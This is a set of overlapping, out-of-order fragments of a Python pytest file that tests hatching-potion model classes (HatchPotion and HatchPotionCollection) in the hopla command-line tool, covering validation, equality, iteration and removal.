"left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert",
"== HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right =",
"next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration):",
"collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1",
"2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert",
"== HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection =",
"= HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert",
"HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\",",
"collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name))",
"}) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"]",
"import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from",
"- 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection =",
"quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is",
"= list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ]",
"== \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42,",
"def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection)",
"int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False",
"assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1,",
"assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\",",
"potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [",
"HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"]",
"}) result: List[HatchPotion] = list(collection.values()) expected: List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2),",
"random from typing import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError",
"(\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity)",
"[ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion",
"potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert",
"collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] ==",
"[ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def",
"@pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\",",
"test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") !=",
"is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names,",
"= \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 })",
"def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3,",
"def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is",
"]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion()",
"k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name,",
"False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity:",
"pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException))",
"\"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert",
"69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion",
"with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching",
"!= HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2})",
"def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] ==",
"quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self):",
"assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\",",
"= HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion()",
"assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) ==",
"exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert",
"quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1,",
"1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\":",
"\"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\",",
"assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize(",
"HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert",
"HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator",
"== HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def",
"HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is",
"assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def",
"test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is",
"quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self):",
"YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE",
"len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2}",
"below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def",
"quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration):",
"1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2,",
"HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"]",
"HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\":",
"exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str,",
"expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\",",
"]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion()",
"iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator)",
"}) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2,",
"1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection =",
"str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result",
"str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") ==",
"assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self,",
"= \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a",
"collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\",",
"pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion,",
"1, \"Frost\": 2}) assert left != right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\":",
"test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name))",
"HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\"",
"potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 =",
"== HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2)",
"<reponame>rickie/hopla<filename>src/tests/hoplalib/hatchery/test_hatchpotionmodels.py<gh_stars>0 #!/usr/bin/env python3 import random from typing import List import click import pytest",
"k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as",
"@pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int):",
"HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name =",
"potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert",
"== \"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator)",
"== HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 =",
"import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException",
"\"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator)",
"assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection",
"0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection =",
"test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def",
"assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2,",
"generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2)",
"\"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2:",
"list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException)",
"is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection()",
"= \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\", 2",
"HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with",
"10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name,",
"assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0,",
"next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator) == HatchPotion(potion3,",
"exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\",",
"potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name:",
"potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is",
"test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3",
"str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion()",
"potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\"",
"quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) ==",
"== HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name =",
"(\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str, quantity: int): potion =",
"collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name",
"collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\",",
"click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str, quantity:",
"== HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert",
"potion3, quantity3 = \"StainedGlass\", 2 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3:",
"quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\",",
"assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\":",
"assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity -",
"True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10),",
"def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is",
"42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name,",
"typing import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata",
"assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\":",
"assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity = 3 potion2_quantity = 42 potion3_name,",
"(\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion =",
"potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) ==",
"(\"Ruby\", 9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str,",
"1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\"))",
"assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") !=",
"potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\", 9),",
"hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\",
"from typing import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from",
"HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\",",
"test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\",",
"test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity}",
"exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) ) def test__repr__ok(self, potion_name: str,",
"TestHatchPotionCollection: def test__init__empty_ok(self): collection = HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) ==",
"assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1,",
"potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity,",
"3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion]",
"HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity =",
"HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"]",
"with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError,",
"2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\",",
"next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41",
"= \"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3",
"result: str = repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\")",
"HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\"",
"= {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] ==",
"int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False",
"is False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\",",
"1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right",
"potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity -",
"HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2)",
"with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection",
"quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3",
"\"InvalidName\" with pytest.raises(HatchPotionException) as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid",
"name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self,",
"== HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\":",
"collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right",
"= HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) ==",
"def test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str =",
"HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left !=",
"quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\",",
"collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42)",
"9001), ]) def test_is_magic_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert",
"quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result == expected def test_remove_hatch_potion_ok(self): potion1_quantity",
"test__repr__ok(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion)",
"quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0),",
"\\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name = \"InvalidName\" with",
"pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name} was not in the collection \"",
"9), (\"Amber\", 69), (\"MossyStone\", 42), (\"SolarSystem\", 9001), ]) def test_is_magic_potion(self, potion_name: str, quantity:",
"hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self):",
"collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1)",
"= HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert",
"def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\")",
"assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) ==",
"@pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\", 0), ]) def test_is_standard_potion(self, potion_name: str,",
"HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\") @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Base\", 10), (\"CottonCandyBlue\", 1), (\"Golden\",",
"{\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\",",
